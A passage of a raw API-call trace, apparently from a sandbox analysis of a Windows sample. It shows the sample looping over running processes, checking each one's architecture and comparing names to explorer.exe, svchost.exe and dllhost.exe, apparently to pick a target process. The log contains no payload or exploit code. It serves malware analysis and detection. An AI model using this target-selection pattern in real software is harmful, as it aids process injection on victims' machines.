(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0230.106] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0230.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0230.107] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.107] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.107] CloseHandle (hObject=0xec) returned 1 [0230.107] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0230.107] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0230.107] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0230.107] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0230.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0230.108] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.108] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.108] CloseHandle (hObject=0xec) returned 1 [0230.108] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0230.108] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0230.108] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0230.108] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0230.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0230.108] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.108] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.108] CloseHandle (hObject=0xec) returned 1 [0230.109] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0230.109] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0230.109] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0230.109] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0230.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0230.109] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.109] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.109] CloseHandle (hObject=0xec) returned 1 [0230.109] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0230.109] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0230.109] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0230.109] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0230.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0230.110] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.110] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.110] CloseHandle (hObject=0xec) returned 1 [0230.110] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0230.110] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0230.110] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0230.110] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0230.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0230.110] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.110] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.110] CloseHandle (hObject=0xec) returned 1 [0230.111] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0230.111] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0230.111] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0230.111] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0230.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0230.111] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.111] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.111] CloseHandle (hObject=0xec) returned 1 [0230.111] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0230.111] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0230.111] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0230.111] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0230.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0230.112] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.112] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.112] CloseHandle (hObject=0xec) returned 1 [0230.112] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0230.112] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0230.112] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0230.112] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0230.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0230.112] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.112] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.113] CloseHandle (hObject=0xec) returned 1 [0230.113] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0230.113] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0230.113] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0230.113] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0230.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0230.113] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.113] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.113] CloseHandle (hObject=0xec) returned 1 [0230.113] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0230.113] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0230.113] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0230.113] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0230.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0230.114] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.114] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.114] CloseHandle (hObject=0xec) returned 1 [0230.114] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0230.114] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0230.114] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0230.114] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0230.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0230.115] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.115] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.115] CloseHandle (hObject=0xec) returned 1 [0230.115] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0230.115] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0230.115] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0230.115] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0230.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0230.115] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.115] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.115] CloseHandle (hObject=0xec) returned 1 [0230.115] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0230.115] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0230.116] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0230.116] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0230.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0230.116] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.116] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.116] CloseHandle (hObject=0xec) returned 1 [0230.116] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0230.116] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0230.116] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0230.116] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0230.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0230.117] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.117] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.117] CloseHandle (hObject=0xec) returned 1 [0230.117] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0230.117] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0230.117] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0230.117] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0230.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0230.117] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.117] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.117] CloseHandle (hObject=0xec) returned 1 [0230.117] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0230.118] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0230.118] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0230.118] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0230.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0230.118] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.118] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.118] CloseHandle (hObject=0xec) returned 1 [0230.118] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0230.118] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0230.118] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0230.118] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0230.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0230.119] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.119] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.119] CloseHandle (hObject=0xec) returned 1 [0230.119] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0230.119] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0230.119] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0230.119] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0230.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0230.119] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.119] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.119] CloseHandle (hObject=0xec) returned 1 [0230.120] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0230.120] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0230.120] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0230.120] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0230.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0230.120] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.120] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.120] CloseHandle (hObject=0xec) returned 1 [0230.120] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0230.120] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0230.120] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0230.120] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0230.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0230.121] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.121] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.121] CloseHandle (hObject=0xec) returned 1 [0230.121] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0230.121] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0230.121] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0230.121] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0230.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0230.121] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0230.122] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0230.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0230.122] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0230.123] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0230.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0230.123] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0230.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0230.124] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.124] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.124] CloseHandle (hObject=0xec) returned 1 [0230.124] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0230.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0230.125] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.125] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.125] CloseHandle (hObject=0xec) returned 1 [0230.125] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0230.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0230.125] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0230.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0230.126] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.126] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.126] CloseHandle (hObject=0xec) returned 1 [0230.126] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0230.126] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0230.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0230.126] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.126] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.126] CloseHandle (hObject=0xec) returned 1 [0230.126] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0230.127] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0230.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0230.127] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.127] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.127] CloseHandle (hObject=0xec) returned 1 [0230.127] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0230.128] CloseHandle (hObject=0xe8) returned 1 [0230.128] Sleep (dwMilliseconds=0x3e8) [0231.138] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0231.140] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, 